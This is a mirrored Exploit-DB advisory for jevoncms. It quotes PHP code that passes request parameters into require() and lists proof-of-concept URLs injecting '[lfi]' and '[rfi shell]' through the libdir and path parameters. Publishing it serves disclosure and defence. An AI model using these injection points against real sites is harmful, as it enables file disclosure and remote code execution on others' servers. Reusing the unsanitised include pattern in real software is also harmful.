bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12071.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

48 lines
No EOL
1.4 KiB
Text
Raw Blame History

########################################################
jevoncms (LFI/RFI) Multiple Vulnerabilities
########################################################
[+]Title : jevoncms (libdir) Multiple Vulnerability
[+]Version: -
[+]Download: http://sourceforge.net/projects/jevoncms/files/
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s To: all friends
########################################################
-=[ Vuln C0de ]=-
***************************
[-] jevoncms/php/main/jevoncms.php
$_PHPLIB["libdir"] = "phplib/";
require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");
***************************
[-] jevoncms/php/main/template/jvc_template.php
if($type!=$lasttype && $type!=''){
$path= "php/".$type."/".$type.".php" ;
// echo $path;
require($path);
***************************
[-] jevoncms/php/menu/menu.php
//require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */
***************************
-=[ Proof Of Concept ]=-
http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]
http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]
http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]
######################=[E0F]=#############################
Reference in a new issue View git blame Copy permalink